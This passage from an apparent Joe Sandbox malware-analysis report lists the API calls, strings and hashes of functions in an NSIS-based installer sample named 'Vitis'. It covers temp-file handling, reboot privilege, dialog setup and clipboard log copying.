lstrcatW.KERNEL32(00437800,.tmp), ref: 0040393A
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 00403946
SetCurrentDirectoryW.KERNEL32(00437800,00437800), ref: 00403966
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
CopyFileW.KERNEL32(00438800,00420EC8,00000001), ref: 004039D8
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
OleUninitialize.OLE32(?), ref: 00403A28
ExitProcess.KERNEL32 ref: 00403A42
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
ExitProcess.KERNEL32 ref: 00403AD6

Strings

\Temp, xrefs: 004037EA
UXTHEME, xrefs: 004035E5, 004035EA, 004035F0
.tmp, xrefs: 00403934
TMP, xrefs: 00403820
NSIS Error, xrefs: 00403658
Low, xrefs: 00403806
Error launching installer, xrefs: 004038C9
~nsu, xrefs: 00403918
TEMP, xrefs: 00403818
SeShutdownPrivilege, xrefs: 00403A6B

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-3195845224
Opcode ID: b83c6689fc87aa81701fa9317f990bacd70601a7b96237c8952e310db2741e89
Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
Opcode Fuzzy Hash: b83c6689fc87aa81701fa9317f990bacd70601a7b96237c8952e310db2741e89
Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C13 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,00437800,00000000), ref: 00405C3C
lstrcatW.KERNEL32(00425710,\*.*), ref: 00405C84
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,00437800,00000000), ref: 00405CAD
FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,00437800,00000000), ref: 00405CBD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
FindClose.KERNEL32(00000000), ref: 00405D6C

Strings

\*.*, xrefs: 00405C7E
., xrefs: 00405CE2
., xrefs: 00405CCE

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$\*.*
API String ID: 2035342205-3749113046
Opcode ID: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
Opcode Fuzzy Hash: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,00437800,00405C33,?,74DF3420,00437800), ref: 00406848
FindClose.KERNEL32(00000000), ref: 00406854

Strings

XgB, xrefs: 0040683E

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405706
GetDlgItem.USER32(?,000003EE), ref: 00405715
GetClientRect.USER32(?,?), ref: 00405752
GetSystemMetrics.USER32(00000002), ref: 00405759
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
ShowWindow.USER32(?,00000008), ref: 004057F5
GetDlgItem.USER32(?,000003EC), ref: 00405816
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
GetDlgItem.USER32(?,000003F8), ref: 00405724

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

GetDlgItem.USER32(?,000003EC), ref: 00405868
CreateThread.KERNEL32(00000000,00000000,Function_0000563C,00000000), ref: 00405876
CloseHandle.KERNEL32(00000000), ref: 0040587D
ShowWindow.USER32(00000000), ref: 004058A1
ShowWindow.USER32(?,00000008), ref: 004058A6
ShowWindow.USER32(00000008), ref: 004058F0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
CreatePopupMenu.USER32 ref: 00405935
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
GetWindowRect.USER32(?,?), ref: 00405969
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
OpenClipboard.USER32(00000000), ref: 004059CA
EmptyClipboard.USER32 ref: 004059D0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
GlobalLock.KERNEL32(00000000), ref: 004059E6
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
CloseClipboard.USER32 ref: 00405A2B

Strings

{, xrefs: 0040590E

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404EE8
GetDlgItem.USER32(?,00000408), ref: 00404EF3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
DeleteObject.GDI32(00000000), ref: 00404FCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
GetWindowLongW.USER32(?,000000F0), ref: 0040510E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
ShowWindow.USER32(?,00000005), ref: 0040512C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
ImageList_Destroy.COMCTL32(?), ref: 004052FA
GlobalFree.KERNEL32(?), ref: 0040530A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
ShowWindow.USER32(?,00000000), ref: 004054B4
GetDlgItem.USER32(?,000003FE), ref: 004054BF
ShowWindow.USER32(00000000), ref: 004054C6

Strings

, xrefs: 0040549E
N, xrefs: 00405165
M, xrefs: 00405084

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
ShowWindow.USER32(?), ref: 00403FC0
GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
ShowWindow.USER32(?,00000004), ref: 00403FEB
DestroyWindow.USER32 ref: 00403FFF
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
GetDlgItem.USER32(?,?), ref: 00404037
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
IsWindowEnabled.USER32(00000000), ref: 00404052
GetDlgItem.USER32(?,00000001), ref: 004040FD
GetDlgItem.USER32(?,00000002), ref: 00404107
SetClassLongW.USER32(?,000000F2,?), ref: 00404121
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
GetDlgItem.USER32(?,00000003), ref: 00404218
ShowWindow.USER32(00000000,?), ref: 00404239
EnableWindow.USER32(?,?), ref: 0040424B
EnableWindow.USER32(?,?), ref: 00404266
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
EnableMenuItem.USER32(00000000), ref: 00404283
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
SetWindowTextW.USER32(?,00423708), ref: 004042EC
ShowWindow.USER32(?,0000000A), ref: 00404420

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB6 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901

lstrcatW.KERNEL32(00437000,00423708), ref: 00403C37
lstrlenW.KERNEL32(004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
lstrcmpiW.KERNEL32(004281B8,.exe,004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
GetFileAttributesW.KERNEL32(004281C0,?,00000000,?), ref: 00403CD5
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403D1E

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

RegisterClassW.USER32(004291C0), ref: 00403D5B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
RegisterClassW.USER32(004291C0), ref: 00403E20
DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F

Strings

_Nb, xrefs: 00403D3A, 00403DA2
RichEdit, xrefs: 00403E11
RichEd32, xrefs: 00403DF2
RichEdit20W, xrefs: 00403E02, 00403E08
RichEd20, xrefs: 00403DE4
.DEFAULT\Control Panel\International, xrefs: 00403C22
.exe, xrefs: 00403CC4
Control Panel\Desktop\ResourceLocale, xrefs: 00403BEA

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 00404622 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
GetDlgItem.USER32(?,000003E8), ref: 004046D4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
GetSysColor.USER32(?), ref: 00404702
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
lstrlenW.KERNEL32(?), ref: 00404723
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
GetDlgItem.USER32(?,0000040A), ref: 0040479E
SendMessageW.USER32(00000000), ref: 004047A5
GetDlgItem.USER32(?,000003E8), ref: 004047D0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
LoadCursorW.USER32(00000000,00007F02), ref: 00404821
SetCursor.USER32(00000000), ref: 00404824
LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
SetCursor.USER32(00000000), ref: 00404840
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881

Strings

N, xrefs: 004047BE

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191

Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
wsprintfA.USER32 ref: 004061CC
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
GlobalFree.KERNEL32(00000000), ref: 004062B5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC

Part of subcall function 00405FF7: GetFileAttributesW.KERNEL32(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Strings

%ls=%ls, xrefs: 004061C2
[Rename], xrefs: 00406236, 00406248

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 68a7ef38075908c9c4bec8123d3c19496071c74805cf3302c9368033bafd0254
Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
Opcode Fuzzy Hash: 68a7ef38075908c9c4bec8123d3c19496071c74805cf3302c9368033bafd0254
Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049A3
SetWindowTextW.USER32(00000000,?), ref: 004049CD
SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
CoTaskMemFree.OLE32(00000000), ref: 00404A89
lstrcmpiW.KERNEL32(004281C0,00423708,00000000,?,?), ref: 00404ABB
lstrcatW.KERNEL32(?,004281C0), ref: 00404AC7
